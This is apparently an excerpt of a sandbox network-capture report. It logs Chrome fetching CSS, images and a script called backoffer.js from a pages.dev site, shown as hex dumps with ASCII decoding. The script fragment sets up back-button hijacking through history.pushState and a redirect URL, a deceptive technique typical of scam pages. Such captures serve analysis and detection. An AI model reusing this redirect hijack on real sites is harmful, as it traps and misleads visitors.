              2024-08-29 22:47:30 UTC1369INData Raw: 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 33 33 33 33 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 34 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 35 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 35 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 36 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 36 2e 36 36 36 36 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 61 75 74 6f 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 63 6f 6c 2d 31 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 2e 33 33 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 32 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b
              Data Ascii: flex:0 0 auto;width:33.3333333333%}.row-cols-4>*{flex:0 0 auto;width:25%}.row-cols-5>*{flex:0 0 auto;width:20%}.row-cols-6>*{flex:0 0 auto;width:16.6666666667%}.col-auto{flex:0 0 auto;width:auto}.col-1{flex:0 0 auto;width:8.33333333%}.col-2{flex:0 0 auto;
              2024-08-29 22:47:30 UTC1369INData Raw: 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 7b 2e 63 6f 6c 2d 73 6d 7b 66 6c 65 78 3a 31 20 30 20 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 61 75 74 6f 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 31 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 32 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 33 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 33 33 33 33 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 34 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f
              Data Ascii: @media (min-width:576px){.col-sm{flex:1 0 0%}.row-cols-sm-auto>*{flex:0 0 auto;width:auto}.row-cols-sm-1>*{flex:0 0 auto;width:100%}.row-cols-sm-2>*{flex:0 0 auto;width:50%}.row-cols-sm-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-sm-4>*{flex:0 0 auto
              2024-08-29 22:47:30 UTC1369INData Raw: 6d 2d 31 2c 2e 67 78 2d 73 6d 2d 31 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 30 2e 32 35 72 65 6d 7d 2e 67 2d 73 6d 2d 31 2c 2e 67 79 2d 73 6d 2d 31 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 30 2e 32 35 72 65 6d 7d 2e 67 2d 73 6d 2d 32 2c 2e 67 78 2d 73 6d 2d 32 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 30 2e 35 72 65 6d 7d 2e 67 2d 73 6d 2d 32 2c 2e 67 79 2d 73 6d 2d 32 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 30 2e 35 72 65 6d 7d 2e 67 2d 73 6d 2d 33 2c 2e 67 78 2d 73 6d 2d 33 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 72 65 6d 7d 2e 67 2d 73 6d 2d 33 2c 2e 67 79 2d 73 6d 2d 33 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 31 72 65 6d 7d 2e 67 2d 73 6d 2d 34 2c 2e 67 78 2d 73 6d 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 2e
              Data Ascii: m-1,.gx-sm-1{--bs-gutter-x:0.25rem}.g-sm-1,.gy-sm-1{--bs-gutter-y:0.25rem}.g-sm-2,.gx-sm-2{--bs-gutter-x:0.5rem}.g-sm-2,.gy-sm-2{--bs-gutter-y:0.5rem}.g-sm-3,.gx-sm-3{--bs-gutter-x:1rem}.g-sm-3,.gy-sm-3{--bs-gutter-y:1rem}.g-sm-4,.gx-sm-4{--bs-gutter-x:1.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.449740188.114.96.34432288C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-08-29 22:47:30 UTC533OUTGET /npm/backoffer.js HTTP/1.1
              Host: dfsvgd.pages.dev
              Connection: keep-alive
              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
              sec-ch-ua-mobile: ?0
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              sec-ch-ua-platform: "Windows"
              Accept: */*
              Sec-Fetch-Site: same-origin
              Sec-Fetch-Mode: no-cors
              Sec-Fetch-Dest: script
              Referer: https://dfsvgd.pages.dev/
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-08-29 22:47:30 UTC755INHTTP/1.1 200 OK
              Date: Thu, 29 Aug 2024 22:47:30 GMT
              Content-Type: text/javascript; charset=utf-8
              Content-Length: 618
              Connection: close
              Access-Control-Allow-Origin: *
              Cache-Control: public, max-age=0, must-revalidate
              ETag: "09641025415c02def83d21149b6a7f1d"
              referrer-policy: strict-origin-when-cross-origin
              x-content-type-options: nosniff
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ioUla0%2F2GbphsoBolSADzg5B93t4oauQ%2BFSsols5zedklIZ%2FEF%2BdyhWIDafjLqJO6TIhIVCIJKr12R8mDOo4KheE0Z1XmK0iZd3M0e5ky9PP3jQViNwk45SE4lm9ubAxCGAS"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bb015516e950fa3-EWR
              alt-svc: h3=":443"; ma=86400
              2024-08-29 22:47:30 UTC614INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 29 7b 0d 0a 20 20 76 61 72 20 74 61 72 67 65 74 4c 6f 63 61 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 75 72 6c 3d 27 27 3b 0d 0a 20 20 20 20 69 66 28 77 2e 62 61 63 6b 4f 66 66 65 72 55 72 6c 29 7b 0d 0a 20 20 20 20 20 20 75 72 6c 3d 77 2e 62 61 63 6b 4f 66 66 65 72 55 72 6c 7d 0d 0a 20 20 20 20 65 6c 73 65 7b 0d 0a 20 20 20 20 20 20 72 65 74 75 72 6e 7d 0d 0a 20 20 20 20 77 2e 68 69 73 74 6f 72 79 26 26 77 2e 68 69 73 74 6f 72 79 2e 70 75 73 68 53 74 61 74 65 26 26 77 2e 68 69 73 74 6f 72 79 2e 70 75 73 68 53 74 61 74 65 28 6e 75 6c 6c 2c 6e 75 6c 6c 2c 77 2e 6c 6f 63 61 74 69 6f 6e 29 3b 0d 0a 20 20 20 20 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 26 26 77 2e 61 64 64
              Data Ascii: (function(w,d){ var targetLocation=function(){ var url=''; if(w.backOfferUrl){ url=w.backOfferUrl} else{ return} w.history&&w.history.pushState&&w.history.pushState(null,null,w.location); w.addEventListener&&w.add
              2024-08-29 22:47:30 UTC4INData Raw: 29 3b 0d 0a
              Data Ascii: );


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.449739188.114.96.34432288C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-08-29 22:47:30 UTC591OUTGET /img/logo-2.jpg HTTP/1.1
              Host: dfsvgd.pages.dev
              Connection: keep-alive
              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
              sec-ch-ua-mobile: ?0
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              sec-ch-ua-platform: "Windows"
              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
              Sec-Fetch-Site: same-origin
              Sec-Fetch-Mode: no-cors
              Sec-Fetch-Dest: image
              Referer: https://dfsvgd.pages.dev/
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-08-29 22:47:30 UTC732INHTTP/1.1 200 OK
              Date: Thu, 29 Aug 2024 22:47:30 GMT
              Content-Type: image/jpeg
              Content-Length: 141454
              Connection: close
              Access-Control-Allow-Origin: *
              Cache-Control: public, max-age=0, must-revalidate
              ETag: "e1a0634a88ed82c8b27af2e8d0c38b63"
              referrer-policy: strict-origin-when-cross-origin
              x-content-type-options: nosniff
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sKJ9FDevd1l2MsQ4DFThO1KUcCYwfPi3K828V%2FzmWzVNhQI2N3NonwmSUVfra4crxbl6G7xQMvekl62qYjRBBXsf5h4MtTjEciMrjpMRMs3Byqp9Kzbs8MeAXRKG6J5rBWvD"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bb015518b571a30-EWR
              alt-svc: h3=":443"; ma=86400
              2024-08-29 22:47:30 UTC637INData Raw: ff d8 ff e1 14 a1 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 02 d0 00 00 01 01 00 03 00 00 00 01 04 38 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d3 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 33 3a 30 36 3a 31 33 20 30 30 3a 31 32 3a 35 35 00 00 00 04 90 00 00 07 00 00 00 04 30
              Data Ascii: ExifMM*8(12i ''Adobe Photoshop 24.2 (Windows)2023:06:13 00:12:550
              2024-08-29 22:47:30 UTC1369INData Raw: 02 03 04 05 06 07 08 09 0a 0b 10 00 01 04 01 03 02 04 02 05 07 06 08 05 03 0c 33 01 00 02 11 03 04 21 12 31 05 41 51 61 13 22 71 81 32 06 14 91 a1 b1 42 23 24 15 52 c1 62 33 34 72 82 d1 43 07 25 92 53 f0 e1 f1 63 73 35 16 a2 b2 83 26 44 93 54 64 45 c2 a3 74 36 17 d2 55 e2 65 f2 b3 84 c3 d3 75 e3 f3 46 27 94 a4 85 b4 95 c4 d4 e4 f4 a5 b5 c5 d5 e5 f5 56 66 76 86 96 a6 b6 c6 d6 e6 f6 37 47 57 67 77 87 97 a7 b7 c7 d7 e7 f7 11 00 02 02 01 02 04 04 03 04 05 06 07 07 06 05 35 01 00 02 11 03 21 31 12 04 41 51 61 71 22 13 05 32 81 91 14 a1 b1 42 23 c1 52 d1 f0 33 24 62 e1 72 82 92 43 53 15 63 73 34 f1 25 06 16 a2 b2 83 07 26 35 c2 d2 44 93 54 a3 17 64 45 55 36 74 65 e2 f2 b3 84 c3 d3 75 e3 f3 46 94 a4 85 b4 95 c4 d4 e4 f4 a5 b5 c5 d5 e5 f5 56 66 76 86 96 a6 b6 c6
              Data Ascii: 3!1AQa"q2B#$Rb34rC%Scs5&DTdEt6UeuF'Vfv7GWgw5!1AQaq"2B#R3$brCScs4%&5DTdEU6teuFVfv
              2024-08-29 22:47:30 UTC1369INData Raw: 0d 55 18 fe e4 ab 35 3c 98 84 80 59 93 24 f2 1b 9c a5 33 fd 63 c4 dd 6b 9f fb ce fb ca ab d5 30 31 3a 96 2b f1 73 ab f5 6a 77 04 ea e6 1e d6 d2 ff 00 cc b1 9f 9a ac 56 7b 29 58 d9 6a 3c 3d 43 16 9b 17 ca 5d d3 dc 3a a1 e8 f7 b5 a6 d6 5c 29 75 81 8c 12 1e 5a 1b 6b 5d b3 d4 fd 2d 4e f5 3f 90 bd 3f 14 b2 aa 9b 46 38 15 51 58 0d ae b6 68 d6 b4 68 d6 80 17 15 d7 b1 c5 3f 5d 7a 6e 44 40 ba b7 49 fe 5d 42 cd 7f cc 75 6b af c1 76 e6 82 51 94 af 87 c4 5f d5 10 80 8f 16 9b 1a 1e 5f 33 70 b6 75 e5 44 97 0e 09 0a c3 1a 21 27 56 12 e0 4f 13 8d 6f 4d c3 19 6d cb 65 4d ab 21 bc be b0 1a 1c 27 74 58 cf a1 ff 00 5c fe 71 6d 31 ed b5 be a3 0c b5 df 78 3e 05 57 b6 a0 a3 8a 4d 57 6d 3f 45 fa 1f 8f e6 94 85 83 e0 a9 93 31 64 92 62 2b 5e cd b8 4d b5 10 84 d0 13 e9 89 ff d2 d7
              Data Ascii: U5<Y$3ck01:+sjwV{)Xj<=C]:\)uZk]-N??F8QXhh?]znD@I]BukvQ__3puD!'VOoMmeM!'tX\qm1x>WMWm?E1db+^M
              2024-08-29 22:47:30 UTC234INData Raw: a8 74 77 b6 cc 97 56 cb 4b 8d 76 63 b5 ff 00 a7 ae 46 e0 eb aa 1f cd b5 cb 6b a2 67 3e b3 73 dc f0 7d 42 37 c8 f7 4f 67 39 e4 fd 1f 72 f4 2f ad df 52 59 d5 d8 fc bc 28 66 78 1a d6 74 65 b0 3f f0 3b ff 00 97 f4 1f fe 13 f7 d7 9a f4 ed d5 ba cc 6b 9b b1 f5 3c 87 35 c2 0b 4b 4f bd ae 9f dd 73 52 96 c7 44 c0 ea 0d fd 1e 8b a5 75 6e 93 81 f5 8f 1f 23 32 df 4f 73 0d 4f b3 f3 58 6c fa 0f c8 25 be ca ff 00 95 ff 00 5c 7f e8 d7 a7 40 f2 e3 c4 7f 9d cf d1 fe 52 f1 5b fa 69 b7 21 d6 db 69 d8 f1 ed da 06 9f ba df e5 7b 55 cd d6 fa 7e 8f da 5f b7 ec 9f b3 67 5d df 65 df f6 af 4b d4 fa 5e 8f a9 ec d9 ff 00 71 ff 00 55 fe 6d 0b 1c 35 69 a3 c5 c5 5d 5f ff d5 ce c6 c6 a3 17 15 95 31 a4 b8 98 0d 20 92 74 97 3b
              Data Ascii: twVKvcFkg>s}B7Og9r/RY(fxte?;k<5KOsRDun#2OsOXl%\@R[i!i{U~_g]eK^qUm5i]_1 t;
              2024-08-29 22:47:30 UTC1369INData Raw: 96 7b 55 5c a0 f6 fb 9b cc c3 1a 64 97 38 fb 59 58 9d ce fa 7b 55 fa 9f 51 3b ac 78 63 44 37 73 88 11 bb da c1 fc 9d ff 00 98 a7 85 84 33 3e b4 f4 ad b0 fa 6b 76 f7 89 9d 29 07 24 3b fe 2f d8 c5 0c 63 67 56 cc e5 c3 1a 1d 1f 43 e9 b8 2c c0 c1 a3 0a b1 ed c7 ad b5 cf 8b 80 fd 23 ff 00 eb 96 ef 7a ba d6 f9 29 54 d8 68 27 93 dc a2 80 a6 6a d3 00 d2 a6 02 78 4b 94 92 a4 e9 00 52 8f 12 92 94 9c 4a 68 09 40 f0 49 4a 3e 6b cb 7e bb e1 d3 89 f5 b6 db eb 68 6b b2 b1 eb bc b4 69 2f 25 f4 d8 ff 00 dd f7 7a 3f e7 af 52 d3 c2 57 2d f5 cf ea a5 fd 5f d1 ce c0 20 66 e3 37 d3 35 38 80 2c ac 9d fb 5a e7 7b 6b ba b7 bb 75 7f 99 67 f3 76 21 2d 42 e8 10 24 2d f2 8c 91 9b 7e 5b db 69 70 75 6e 03 6c 88 60 3f 43 46 bb 66 ed a8 df b3 ce d8 d7 e8 ed 8f 29 9d df d7 57 32 70 7e b0
              Data Ascii: {U\d8YX{UQ;xcD7s3>kv)$;/cgVC,#z)Th'jxKRJh@IJ>k~hki/%z?RW-_ f758,Z{kugv!-B$-~[ipunl`?CFf)W2p~
              2024-08-29 22:47:30 UTC1369INData Raw: 40 18 15 d8 40 6c e9 ec 67 bf f9 4d fa 6a cd b6 b5 c2 ea 0b 09 fa 3e ad 4e 2e b3 47 43 77 b5 cc db bf dd fc a5 57 26 cc 57 d0 c0 6b 6b 5b 60 35 9b 4b 65 f5 b9 a3 e8 bd 96 0b 2c 77 f2 fd 3f 7d 7f e9 12 52 1a 1d 4d 44 d5 6b 5c 23 da 41 ec 47 6e 5a df fa 68 0c d8 1c 1a da 07 27 5b 1e 0b 74 27 5d de fd aa 0d 3b ec 6b 8b 83 dc 37 34 b9 c1 cf 78 3f bb ef fc c4 4a 1d 4b 0b 88 ad b1 ee 04 10 e1 af 9d 6d 6f b5 04 b7 6b b6 8a 04 ba ba 6c 2e 1e d7 0d 9e 94 c7 b9 bb bd 46 3d c8 ad ea 4f c8 66 ca 98 e6 57 c1 73 2a b5 cd 6f fd b0 e3 52 cd a1 e1 c4 dc e6 82 ed 08 7b 4b c8 03 ca 1d 47 bb f3 7f 4c ad 96 99 3b 5a 35 13 5b a5 b1 3f 9c dd 8f b5 ff 00 4b f9 08 a1 2b 9f 2c 0f 7b 43 58 cf 6b 8e dd e4 76 fa 59 4f f6 fb bf 92 a1 ea 61 ee dd 34 cc 6f dd e5 b7 66 ef e7 ff 00 9c ff
              Data Ascii: @@lgMj>N.GCwW&Wkk[`5Ke,w?}RMDk\#AGnZh'[t'];k74x?JKmokl.F=OfWs*oR{KGL;Z5[?K+,{CXkvYOa4of
              2024-08-29 22:47:30 UTC1369INData Raw: 00 01 00 32 00 00 00 01 00 5a 00 00 00 06 00 00 00 00 00 01 00 35 00 00 00 01 00 2d 00 00 00 06 00 00 00 00 00 01 38 42 49 4d 03 f8 00 00 00 00 00 70 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 03 e8 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 03 e8 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 03 e8 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 03 e8 00 00 38 42 49 4d 04 08 00 00 00 00 00 10 00 00 00 01 00 00 02 40 00 00 02 40 00 00 00 00 38 42 49 4d 04 44 00 00 00 00 00 10 00 00 00 02 00 00 02 40 00 00 02 40 00 00 00 00 38 42 49 4d 04 1e 00 00 00 00 00 04 00 00 00 00 38 42 49 4d 04 1a 00 00 00 00 03 53 00 00 00 06 00 00 00 00 00
              Data Ascii: 2Z5-8BIMp8BIM@@8BIMD@@8BIM8BIMS
              2024-08-29 22:47:30 UTC1369INData Raw: 22 00 02 11 01 03 11 01 ff dd 00 04 00 07 ff c4 01 3f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 03 00 01 02 04 05 06 07 08 09 0a 0b 01 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 01 00 02 03 04 05 06 07 08 09 0a 0b 10 00 01 04 01 03 02 04 02 05 07 06 08 05 03 0c 33 01 00 02 11 03 04 21 12 31 05 41 51 61 13 22 71 81 32 06 14 91 a1 b1 42 23 24 15 52 c1 62 33 34 72 82 d1 43 07 25 92 53 f0 e1 f1 63 73 35 16 a2 b2 83 26 44 93 54 64 45 c2 a3 74 36 17 d2 55 e2 65 f2 b3 84 c3 d3 75 e3 f3 46 27 94 a4 85 b4 95 c4 d4 e4 f4 a5 b5 c5 d5 e5 f5 56 66 76 86 96 a6 b6 c6 d6 e6 f6 37 47 57 67 77 87 97 a7 b7 c7 d7 e7 f7 11 00 02 02 01 02 04 04 03 04 05 06 07 07 06 05 35 01 00 02 11 03 21 31 12 04 41 51 61 71 22 13 05 32 81 91 14 a1 b1 42 23 c1 52 d1 f0 33 24 62
              Data Ascii: "?3!1AQa"q2B#$Rb34rC%Scs5&DTdEt6UeuF'Vfv7GWgw5!1AQaq"2B#R3$b
              2024-08-29 22:47:30 UTC1369INData Raw: 29 68 65 55 0d ac 60 e0 0f fc 93 be 93 d5 23 a3 ab cb f3 12 c5 8e 42 3f 31 3b f4 61 89 f5 73 a3 d0 07 a9 5b b2 9f dd d7 38 86 ff 00 db 35 6c 67 f9 fe aa d7 c5 c7 c4 c7 11 8d 45 54 0f f8 36 35 bf f5 0d 55 18 fe e4 ab 35 3c 98 84 80 59 93 24 f2 1b 9c a5 33 fd 63 c4 dd 6b 9f fb ce fb ca ab d5 30 31 3a 96 2b f1 73 ab f5 6a 77 04 ea e6 1e d6 d2 ff 00 cc b1 9f 9a ac 56 7b 29 58 d9 6a 3c 3d 43 16 9b 17 ca 5d d3 dc 3a a1 e8 f7 b5 a6 d6 5c 29 75 81 8c 12 1e 5a 1b 6b 5d b3 d4 fd 2d 4e f5 3f 90 bd 3f 14 b2 aa 9b 46 38 15 51 58 0d ae b6 68 d6 b4 68 d6 80 17 15 d7 b1 c5 3f 5d 7a 6e 44 40 ba b7 49 fe 5d 42 cd 7f cc 75 6b af c1 76 e6 82 51 94 af 87 c4 5f d5 10 80 8f 16 9b 1a 1e 5f 33 70 b6 75 e5 44 97 0e 09 0a c3 1a 21 27 56 12 e0 4f 13 8d 6f 4d c3 19 6d cb 65 4d ab 21
              Data Ascii: )heU`#B?1;as[85lgET65U5<Y$3ck01:+sjwV{)Xj<=C]:\)uZk]-N??F8QXhh?]znD@I]BukvQ__3puD!'VOoMmeM!
              2024-08-29 22:47:30 UTC1369INData Raw: a5 4f fe 6c f5 1b 5c 2b a8 3a c7 1e 18 d0 5e 7f cd 62 f7 66 fd 5e e9 0d fa 38 38 ff 00 36 03 ff 00 55 2a dd 58 75 52 dd b5 54 da 9b e1 5b 43 47 fd 00 11 11 90 ea 3e c5 92 9c 0e d1 3f 6b f3 ed fd 0f a8 74 77 b6 cc 97 56 cb 4b 8d 76 63 b5 ff 00 a7 ae 46 e0 eb aa 1f cd b5 cb 6b a2 67 3e b3 73 dc f0 7d 42 37 c8 f7 4f 67 39 e4 fd 1f 72 f4 2f ad df 52 59 d5 d8 fc bc 28 66 78 1a d6 74 65 b0 3f f0 3b ff 00 97 f4 1f fe 13 f7 d7 9a f4 ed d5 ba cc 6b 9b b1 f5 3c 87 35 c2 0b 4b 4f bd ae 9f dd 73 52 96 c7 44 c0 ea 0d fd 1e 8b a5 75 6e 93 81 f5 8f 1f 23 32 df 4f 73 0d 4f b3 f3 58 6c fa 0f c8 25 be ca ff 00 95 ff 00 5c 7f e8 d7 a7 40 f2 e3 c4 7f 9d cf d1 fe 52 f1 5b fa 69 b7 21 d6 db 69 d8 f1 ed da 06 9f ba df e5 7b 55 cd d6 fa 7e 8f da 5f b7 ec 9f b3 67 5d df 65 df f6
              Data Ascii: Ol\+:^bf^886U*XuRT[CG>?ktwVKvcFkg>s}B7Og9r/RY(fxte?;k<5KOsRDun#2OsOXl%\@R[i!i{U~_g]e


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.449744188.114.96.34432288C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-08-29 22:47:32 UTC592OUTGET /img/wa-logo.svg HTTP/1.1
              Host: dfsvgd.pages.dev
              Connection: keep-alive
              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
              sec-ch-ua-mobile: ?0
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              sec-ch-ua-platform: "Windows"
              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
              Sec-Fetch-Site: same-origin
              Sec-Fetch-Mode: no-cors
              Sec-Fetch-Dest: image
              Referer: https://dfsvgd.pages.dev/
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-08-29 22:47:32 UTC739INHTTP/1.1 200 OK
              Date: Thu, 29 Aug 2024 22:47:32 GMT
              Content-Type: image/svg+xml
              Content-Length: 2648
              Connection: close
              Access-Control-Allow-Origin: *
              Cache-Control: public, max-age=0, must-revalidate
              ETag: "25c86fe408000f9d7d23dd184c483eb2"
              referrer-policy: strict-origin-when-cross-origin
              x-content-type-options: nosniff
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5VmVJB%2F1DYUk9pJcBVHOsxj%2B%2Fa6RIp92QPFy0IBXLLf6rzIukblm3byxaiQGRHBqvNqYAJIaDxR3g0zXKDNfi0WetdOl6FAqyZRMvn%2BMa8MZQgnyl04gMndGj0EUPSywpzFf"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bb0155a3dc832e8-EWR
              alt-svc: h3=":443"; ma=86400
              2024-08-29 22:47:32 UTC630INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 33 37 22 20 68 65 69 67 68 74 3d 22 33 36 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 2e 36 37 37 20 33 34 2e 31 34 6c 32 2e 33 30 33 2d 38 2e 33 39 34 61 31 36 2e 31 37 37 20 31 36 2e 31 37 37 20 30 20 30 31 2d 32 2e 31 36 36 2d 38 2e 30 38 37 63 30 2d 38 2e 39 32 33 20 37 2e 32 36 38 2d 31 36 2e 31 39 32 20 31 36 2e 31 39 31 2d 31 36 2e 31 39 32 20 34 2e 33 33 34 20 30 20 38 2e 33 39 34 20 31 2e 36 39 20 31 31 2e 34 36 35 20 34 2e 37 34 33 61 31 36 2e 31 30
              Data Ascii: <svg width="37" height="36" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path d="M2.677 34.14l2.303-8.394a16.177 16.177 0 01-2.166-8.087c0-8.923 7.268-16.192 16.191-16.192 4.334 0 8.394 1.69 11.465 4.743a16.10
              2024-08-29 22:47:32 UTC1369INData Raw: 35 32 35 20 31 36 2e 37 37 31 2d 31 36 2e 37 37 32 20 31 36 2e 37 37 31 2d 32 2e 38 31 35 20 30 2d 35 2e 35 36 32 2d 2e 37 2d 38 2e 30 31 39 2d 32 2e 30 34 37 4c 32 2e 30 39 37 20 33 34 2e 37 32 7a 6d 39 2e 32 39 39 2d 35 2e 33 35 37 6c 2e 35 31 31 2e 33 30 37 61 31 33 2e 39 35 35 20 31 33 2e 39 35 35 20 30 20 30 30 37 2e 30 39 38 20 31 2e 39 34 35 63 37 2e 36 37 38 20 30 20 31 33 2e 39 34 2d 36 2e 32 36 31 20 31 33 2e 39 34 2d 31 33 2e 39 34 20 30 2d 33 2e 37 31 39 2d 31 2e 34 35 2d 37 2e 32 33 33 2d 34 2e 30 37 38 2d 39 2e 38 36 61 31 33 2e 38 39 20 31 33 2e 38 39 20 30 20 30 30 2d 39 2e 38 36 32 2d 34 2e 30 39 36 63 2d 37 2e 36 39 35 20 30 2d 31 33 2e 39 35 36 20 36 2e 32 36 32 2d 31 33 2e 39 35 36 20 31 33 2e 39 34 20 30 20 32 2e 36 32 37 2e 37 33 33
              Data Ascii: 525 16.771-16.772 16.771-2.815 0-5.562-.7-8.019-2.047L2.097 34.72zm9.299-5.357l.511.307a13.955 13.955 0 007.098 1.945c7.678 0 13.94-6.261 13.94-13.94 0-3.719-1.45-7.233-4.078-9.86a13.89 13.89 0 00-9.862-4.096c-7.695 0-13.956 6.262-13.956 13.94 0 2.627.733
